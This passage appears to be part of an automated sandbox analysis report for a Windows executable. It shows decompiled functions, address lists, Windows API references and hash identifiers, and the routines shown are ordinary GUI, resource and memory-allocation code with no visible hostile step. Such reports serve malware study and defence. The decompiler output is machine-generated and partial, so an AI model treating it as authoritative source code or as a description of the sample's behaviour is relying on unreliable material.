						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                        0x0040ae48
                                                                        0x0040ae52
                                                                        0x0040ae5c
                                                                        0x0040ae66
                                                                        0x0040ae6d
                                                                        0x0040ae6f
                                                                        0x0040ae6f
                                                                        0x0040ae77
                                                                        0x0040ae83
                                                                        0x0040ae8f
                                                                        0x0040ae8f
                                                                        0x0040aea3
                                                                        0x0040aeac
                                                                        0x0040af5b
                                                                        0x0040af60
                                                                        0x0040af65
                                                                        0x0040af6c
                                                                        0x0040af71
                                                                        0x0040af73
                                                                        0x0040af76
                                                                        0x0040af7c
                                                                        0x0040af7e
                                                                        0x00000000
                                                                        0x0040af86
                                                                        0x0040aeb2
                                                                        0x0040aeb2
                                                                        0x0040aeb9
                                                                        0x0040aebb
                                                                        0x0040aec2
                                                                        0x00000000
                                                                        0x0040aec2
                                                                        0x0040aecf
                                                                        0x0040aedf
                                                                        0x0040aee1
                                                                        0x0040aee6
                                                                        0x0040aee9
                                                                        0x0040aeef
                                                                        0x0040aef1
                                                                        0x0040aef3
                                                                        0x00000000
                                                                        0x0040aef3
                                                                        0x0040aeff
                                                                        0x0040af04
                                                                        0x0040af0a
                                                                        0x0040af0a
                                                                        0x0040af0c
                                                                        0x0040af0d
                                                                        0x0040af0e
                                                                        0x0040af0e
                                                                        0x0040af2a
                                                                        0x0040af30
                                                                        0x0040af35
                                                                        0x0040af3a
                                                                        0x0040af40
                                                                        0x0040af40
                                                                        0x0040af44
                                                                        0x0040af47
                                                                        0x0040af4d
                                                                        0x0040af4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af51
                                                                        0x0040af54
                                                                        0x0040af54
                                                                        0x0040af55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af55
                                                                        0x0040af40
                                                                        0x0040af8d
                                                                        0x0040af8d
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF30
                                                                        • GetThreadLocale.KERNEL32 ref: 0040AE66
                                                                          • Part of subcall function 0040ADC4: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InfoLocaleStringThreadType
                                                                        • String ID:
                                                                        • API String ID: 1505017576-0
                                                                        • Opcode ID: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction ID: 6a4de5057cbed62019ff6cd1b2bb6358f707544f7e948a3695c44cd18fd2b04b
                                                                        • Opcode Fuzzy Hash: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction Fuzzy Hash: B731F6A16803839AD710DB65AC01FA63794EB6134CF1580FBE984AB3D2DB3D4865C76F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00423738, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E00423738(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00420398(_v8);
					_push(_t87);
					_push(0x423817);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E00424A54( *((intOrPtr*)(_v8 + 0x58)));
					E004235B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E00424C34( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E004207B0(_v8, _t69);
					_t59 =  *0x47a788; // 0x21706f4
					E00414814(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x42381e);
					return E00420604(_v8);
				}
			}

















                                                                        0x00423739
                                                                        0x0042373b
                                                                        0x0042373e
                                                                        0x00423741
                                                                        0x00423748
                                                                        0x00423822
                                                                        0x0042374e
                                                                        0x00423751
                                                                        0x00423758
                                                                        0x00423759
                                                                        0x0042375e
                                                                        0x00423761
                                                                        0x0042376a
                                                                        0x0042377b
                                                                        0x00423786
                                                                        0x00423792
                                                                        0x0042379d
                                                                        0x004237a2
                                                                        0x004237b8
                                                                        0x004237a4
                                                                        0x004237ae
                                                                        0x004237ae
                                                                        0x004237c4
                                                                        0x004237c9
                                                                        0x004237e7
                                                                        0x004237cb
                                                                        0x004237d7
                                                                        0x004237db
                                                                        0x004237db
                                                                        0x004237ef
                                                                        0x004237f7
                                                                        0x004237fc
                                                                        0x00423803
                                                                        0x00423806
                                                                        0x00423809
                                                                        0x00423816
                                                                        0x00423816

                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042378D
                                                                        • SelectObject.GDI32(00000000,?), ref: 004237A6
                                                                        • SelectPalette.GDI32(00000000,?,000000FF), ref: 004237CF
                                                                        • RealizePalette.GDI32(00000000), ref: 004237DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                        • String ID:
                                                                        • API String ID: 979337279-0
                                                                        • Opcode ID: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction ID: c88b5c0543f23b78fd250c8d9274629173d69d4b00430ff76432291ce0c063de
                                                                        • Opcode Fuzzy Hash: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction Fuzzy Hash: E0310874B04654EFDB04EF5AD981D4DB3F5EF48714B6281A6F804AB362C738EE80DA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044A130, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0044A130(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044983C(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004496B8(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004496B8(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408CB4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408BF8(_a12, _t49);
				}
			}










                                                                        0x0044a137
                                                                        0x0044a139
                                                                        0x0044a13b
                                                                        0x0044a146
                                                                        0x00000000
                                                                        0x0044a1ca
                                                                        0x0044a14a
                                                                        0x0044a15a
                                                                        0x0044a177
                                                                        0x0044a17c
                                                                        0x0044a181
                                                                        0x0044a18e
                                                                        0x0044a18e
                                                                        0x0044a15c
                                                                        0x0044a163
                                                                        0x0044a170
                                                                        0x0044a170
                                                                        0x0044a195
                                                                        0x00000000
                                                                        0x0044a197
                                                                        0x0044a19a
                                                                        0x0044a1a9
                                                                        0x00000000
                                                                        0x0044a1b1

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$ItemStateString
                                                                        • String ID:
                                                                        • API String ID: 306270399-0
                                                                        • Opcode ID: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction ID: a086aaca1138dc505a42b3517b193e50cf2349fe978f08e3be5af1dc0d792112
                                                                        • Opcode Fuzzy Hash: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction Fuzzy Hash: 64117F31602214AFDB00EF2D8C81AAF77E89F4A364F10446AF819E7382D6389D11D769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045BF2C, Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045BF2C(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045BEC4(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043CC2C(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045BE40(_t43);
				SetWindowPos(E0043CC2C(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045BE40(_t43);
				}
				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043CC2C(_t43));
				}
				return _t26;
			}










                                                                        0x0045bf30
                                                                        0x0045bf32
                                                                        0x0045bf34
                                                                        0x0045bf37
                                                                        0x0045bf3c
                                                                        0x0045bf3e
                                                                        0x00000000
                                                                        0x0045bf42
                                                                        0x0045bf50
                                                                        0x0045bf56
                                                                        0x0045bf58
                                                                        0x0045bf6f
                                                                        0x0045bf6f
                                                                        0x0045bf5a
                                                                        0x0045bf62
                                                                        0x0045bf67
                                                                        0x0045bf69
                                                                        0x00000000
                                                                        0x0045bf6b
                                                                        0x0045bf6b
                                                                        0x0045bf6b
                                                                        0x0045bf69
                                                                        0x0045bf75
                                                                        0x0045bf9a
                                                                        0x0045bfa3
                                                                        0x0045bfa9
                                                                        0x0045bfab
                                                                        0x0045bfaf
                                                                        0x0045bfaf
                                                                        0x0045bfbe
                                                                        0x0045bfc3
                                                                        0x0045bfc5
                                                                        0x00000000
                                                                        0x0045bfcf
                                                                        0x0045bfd8

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 0045BF37
                                                                        • IsWindowVisible.USER32(00000000), ref: 0045BF62
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BF9A
                                                                        • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BFCF
                                                                          • Part of subcall function 0045BEC4: IsWindowVisible.USER32(00000000), ref: 0045BEDB
                                                                          • Part of subcall function 0045BEC4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF02
                                                                          • Part of subcall function 0045BEC4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$FocusVisible$EmptyRect
                                                                        • String ID:
                                                                        • API String ID: 698668684-0
                                                                        • Opcode ID: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction ID: 0c7870d5d9d24088c3abd12cb0ef2774cc45ea1f721d3d528cff2115086cf705
                                                                        • Opcode Fuzzy Hash: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction Fuzzy Hash: 1B1177713002016BD511BA7A8D85A6BB79DDF45345B08056AFD48DB343CB2DEC0697AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422948, Relevance: 6.1, APIs: 4, Instructions: 64windowfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E00422948(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				int _t29;
				void* _t33;
				void* _t35;
				struct HPALETTE__* _t36;
				void* _t38;
				struct HPALETTE__* _t39;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t33 = __edx;
				_t29 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
					_t39 = 0;
					if(_t36 != 0) {
						_t39 = SelectPalette(E00420730(__edx), _t36, 0xffffffff);
						RealizePalette(E00420730(_t33));
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t35 = _t33;
					_t38 = _t36;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420730(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
					if(_t38 != 0) {
						return SelectPalette(E00420730(_t35), _t39, 0xffffffff);
					}
				}
				return _t11;
			}











                                                                        0x00422948
                                                                        0x0042294f
                                                                        0x00422952
                                                                        0x00422954
                                                                        0x0042295a
                                                                        0x00422963
                                                                        0x00422965
                                                                        0x00422969
                                                                        0x0042297b
                                                                        0x00422985
                                                                        0x00422985
                                                                        0x00422995
                                                                        0x00422996
                                                                        0x00422997
                                                                        0x00422998
                                                                        0x00422999
                                                                        0x0042299a
                                                                        0x0042299b
                                                                        0x0042299f
                                                                        0x004229b7
                                                                        0x004229be
                                                                        0x00000000
                                                                        0x004229cb
                                                                        0x004229be
                                                                        0x004229d7

                                                                        APIs
                                                                        • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422976
                                                                        • RealizePalette.GDI32(00000000), ref: 00422985
                                                                        • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 004229B7
                                                                        • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 004229CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Palette$Select$FileMetaPlayRealize
                                                                        • String ID:
                                                                        • API String ID: 1995988871-0
                                                                        • Opcode ID: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction ID: 088bed5f8542f6c822edce03a29eb1a8d7af9251e81d94029e29098bb0995351
                                                                        • Opcode Fuzzy Hash: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction Fuzzy Hash: 7301A5717082206BC210BB699C8495BB3DDDF85320F06063BB858EB382D679EC40DAD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004555D8, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004555D8(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x496c04; // 0x2170d40
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00455568, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00414208( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                        0x004555da
                                                                        0x004555dd
                                                                        0x004555df
                                                                        0x004555e8
                                                                        0x004555f5
                                                                        0x004555fe
                                                                        0x00455601
                                                                        0x0045560d
                                                                        0x00455612
                                                                        0x00455612
                                                                        0x0045561c
                                                                        0x0045562a
                                                                        0x0045562c
                                                                        0x00455639
                                                                        0x0045563b
                                                                        0x0045563b
                                                                        0x00455642
                                                                        0x00455642
                                                                        0x0045564b
                                                                        0x0045564f
                                                                        0x00455651
                                                                        0x00455665
                                                                        0x00455671
                                                                        0x00455676
                                                                        0x00455677
                                                                        0x00455651
                                                                        0x0045564f
                                                                        0x0045561c
                                                                        0x0045567c
                                                                        0x0045567c
                                                                        0x00455686

                                                                        APIs
                                                                        • EnumWindows.USER32(00455568), ref: 0045560D
                                                                        • GetWindow.USER32(00000003,00000003), ref: 00455625
                                                                        • GetWindowLongA.USER32 ref: 00455632
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455671
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$EnumLongWindows
                                                                        • String ID:
                                                                        • API String ID: 4191631535-0
                                                                        • Opcode ID: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction ID: 2c8fcb29ad70036d63b1f57068b34d5d0e3d2e3afda160b4fc5bec8406b8bc50
                                                                        • Opcode Fuzzy Hash: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction Fuzzy Hash: 94115170604650AFDB10AB2CCC95FA673D8EB04725F55017AFD98AB2D3C3749C44C799
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00417214, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00417214(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E004171A4(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416fb4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E004171A4(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416fb4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416ad4
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416F74(_t23, _t25, _t18);
			}

















                                                                        0x0041721b
                                                                        0x0041721e
                                                                        0x00417220
                                                                        0x00417230
                                                                        0x00417232
                                                                        0x00417235
                                                                        0x00417237
                                                                        0x0041723a
                                                                        0x0041723f
                                                                        0x0041723f
                                                                        0x00417240
                                                                        0x0041724a
                                                                        0x0041724c
                                                                        0x0041724f
                                                                        0x00417251
                                                                        0x00417254
                                                                        0x00417259
                                                                        0x0041725a
                                                                        0x00417264
                                                                        0x00417265
                                                                        0x00417269
                                                                        0x00417272
                                                                        0x0041727d

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0041722B
                                                                        • LoadResource.KERNEL32(?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417245
                                                                        • SizeofResource.KERNEL32(?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 0041725F
                                                                        • LockResource.KERNEL32(00416AD4,00000000,?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417269
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction ID: 3290e5c036addd08ea02881163b77e979cd31cb4f03c08ba38f160ae1e3d6bef
                                                                        • Opcode Fuzzy Hash: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction Fuzzy Hash: F9F04BB26052046F9704EE5EA881D9B77ECEE89364311416AF909D7202DA39ED518768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040161C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040161C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040146C(0x4965e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                        0x00401620
                                                                        0x00401622
                                                                        0x00401624
                                                                        0x00401626
                                                                        0x0040163a
                                                                        0x0040163f
                                                                        0x00401641
                                                                        0x00401645
                                                                        0x0040164d
                                                                        0x00401653
                                                                        0x0040165f
                                                                        0x00401664
                                                                        0x00401664
                                                                        0x00401669
                                                                        0x00401672
                                                                        0x00401679
                                                                        0x00401685
                                                                        0x0040168c
                                                                        0x00000000
                                                                        0x0040168c
                                                                        0x00401679
                                                                        0x00401692

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 0040163A
                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 0040165F
